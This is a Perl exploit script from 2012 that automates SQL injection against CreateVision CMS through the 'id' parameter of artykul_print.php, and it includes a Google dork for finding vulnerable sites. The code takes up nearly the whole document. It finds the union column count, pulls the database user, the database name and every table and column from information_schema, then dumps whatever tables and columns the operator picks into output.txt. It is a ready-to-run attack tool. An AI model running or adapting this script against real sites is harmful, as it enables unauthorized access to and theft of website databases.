#!/usr/local/bin/perl # # Exploit Title: CreateVision CMS Database injection. # Description: Virtually none of the variables are not filtered. # Google Dork: inurl:artykul_print.php # Date: 2012/02/24 # Author : Zwierzchowski Oskar # Software Link: http://www.createvision.pl/ # Version: All Version # Security Risk: High # Tested on: FreeBSD # Greets: Grzegorz Stachowiak, Damian Blaszczyk, Borislav Kotov. use strict; use warnings; use LWP::Simple; sub main () { my %config = ( 'host' => '', 'columns' => ',3,4', 'column' => '', 'table' => '' ); my %send = (); getops(\%config); getcolumn(\%config, \%send); getuser(\%config, \%send); getdatabase(\%config, \%send); gettables(\%config, \%send); otherdata(\%config, \%send); return 0; } sub getdatabase ($$) { my $config = shift; my $send = shift; my $data; $data = get $config->{host}.$send->{database}; analizedata($data, 'Database'); return ($config, $send); } sub getuser ($$) { my $config = shift; my $send = shift; my $data; $data = get $config->{host}.$send->{user}; analizedata($data, 'User'); return ($config, $send); } sub gettables ($$) { my $config = shift; my $send = shift; my $data; $data = get $config->{host}.$send->{column}; analizedata($data, 'Tables'); } sub otherdata ($$) { my $config = shift; my $send = shift; my $data; my $table; my $column; print "[+]\tIf you want to draw some data? (1 or 2)\r\n\r\n"; print "[1]\tYes\r\n"; print "[2]\tNo\r\n"; $data = <STDIN>; chomp($data); if ($data == 2) { exit 0; } else { print "[+]\tName of the table which you want to download (check the output.txt) :\r\n"; $table = <STDIN>; chomp($table); print "[+]\tGet column/s: (ex. column1,column2,column3)\r\n"; $column = <STDIN>; chomp($column); $column =~ s/,/,char(58),/g; $send->{tables} = '/artykul_print.php?id=103+and+1=2+union+select+1,concat('.$column.')'.$config->{columns}.'+from+'.$table.'--'; $data = get $config->{host}.$send->{tables}; analizedata($data, 'MYDATA'); } return 0; } sub analizedata ($$) { my $data = shift; my $pref = shift; my $table; my $column; my @columns = (''); my @tables = (''); while ($data =~ /<span class=\"tytul_artykulu\">(.*?)<\/span>/g) { if ($pref eq 'Tables') { ($table, $column) = split(/:/, $1); save($1, 'output.txt'); push(@columns, $column); if ($table eq $tables[$#tables]) { } else { push(@tables, $table); } } else { print "[+]\t[".$pref."][".$1."]\r\n"; save($1, 'output.txt'); } } if ($pref eq 'Tables') { print "[+]\t".$#columns." columns in ".$#tables." tables\r\n"; print "[+]\tResults has been saved into output.txt\r\n"; } return 0; } sub getops ($) { my $config = shift; if (!$ARGV[0] || $ARGV[0] !~ /http:\/\//) { print "[+]\tUsage: perl splo.pl http://host.com\r\n"; exit 0; } else { $config->{host} = $ARGV[0]; } return $config; } sub getcolumn ($$) { my $config = shift; my $send = shift; my $data; for (1..20) { incrcolum($config); $send->{user} = '/artykul_print.php?id=105+and+1=2+union+select+1,user()'.$config->{columns}.'--'; $send->{database} = '/artykul_print.php?id=105+and+1=2+union+select+1,database()'.$config->{columns}.'--'; $send->{column} = '/artykul_print.php?id=105+and+1=2+union+select+1,concat(table_name,char(58),column_name)'.$config->{columns}.'+from+information_schema.columns--'; $data = get $config->{host}.$send->{user}; if (index($data, "<span class=\"tytul_artykulu\">") != -1) { return ($config, $send); } } return $config; } sub incrcolum ($) { my $config = shift; my @digits = split(/,/, $config->{columns}); my $data = (($digits[$#digits])+1); $config->{columns} =~ s/$config->{columns}/$config->{columns},$data/g; return $config; } sub save ($$) { my $data = shift; my $file = shift; open(FILE, ">>".$file.""); print FILE "".$data."\r\n"; close FILE; return 0; } main();